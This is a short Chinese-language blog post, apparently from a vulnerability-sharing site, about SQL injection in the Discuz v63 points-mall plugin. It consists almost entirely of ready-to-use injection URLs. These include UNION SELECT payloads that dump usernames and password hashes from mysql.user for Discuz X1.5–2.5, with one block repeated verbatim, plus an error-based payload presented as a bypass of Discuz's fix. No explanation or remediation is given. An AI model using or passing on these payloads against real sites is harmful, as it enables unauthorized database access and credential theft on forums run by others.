Discuz v63积分商城插件注入&各种绕过

  • A+
所属分类:漏洞时代
摘要

  For Discuz X1.5-2.0
[php]
http://localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
[/php]

 

 

For Discuz X1.5-2.0
[php]
http://localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
[/php]

For Discuz X2.5
[php]
/discuz/plugin.php?id=v63shop:goods&pac=info&[email protected]`'` union select @`'`,2,3,4,5,6,7,concat(host,0x3a,user),9,10,11,12,13,14 from mysql.user
[/php]

绕过Discuz修复补丁
[php]
http://localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`[/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: